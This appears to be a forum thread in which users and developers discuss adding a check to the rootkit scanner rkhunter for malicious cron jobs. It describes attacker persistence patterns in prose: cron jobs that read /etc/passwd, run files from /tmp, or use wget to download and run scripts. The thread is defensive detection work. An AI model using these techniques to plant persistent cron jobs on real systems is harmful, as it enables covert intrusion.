It would be nice if rkhunter could scan for nasty jobs in /etc/cron.* and /var/spool/cron/*
We've found nasty stuff in user cronjobs on several occasions. Maybe check for jobs that try to access files like /etc/passwd or jobs that try to run something in /tmp.
We've discussed this between developers but I don't see a check for this coming RSN. What you could do for now is inspect common cron job directories and users cron spools and then add them to your rkhunter.conf USER_FILEPROP_FILES_DIRS test. At least you will be notified when file contents change, allowing you to inspect them.
RKH works mainly by looking for known rootkit files or suspicious looking files. In only a few tests does it actually look 'in' files. Checking cron jobs would require looking in the files for... what? We could check to see if a known rootkit file was being run, but then RKH should pick that up anyway (because the rootkit file exists).
I think checking for things like accessing /etc/passwd or/tmp could give false-positives. It is not unreasonable for a sysadmin to check /etc/passwd with a cron job (given that the file doesn't contain passwords, just account names).
I think we would need a much clearer definition of 'nasty jobs' before trying to implement anything.
I discovered a script that the hacker is executing using a cron job. Can we integrate this script into the rkhunter toolkit check?
If I may interject here; I work for a pretty large hosting company, and on a lot of client servers typically when an attacker using cron it is to maintain access so it would typically be a cron job to download and execute a script. A good way to implement this would be to add in a new config variable for whitelisting things like cpanel's cron jobs and then check for wgets to various domains. Typically the malicious users will have a wget running with * * *
Last edit: Abhilash Mandula 2024-07-13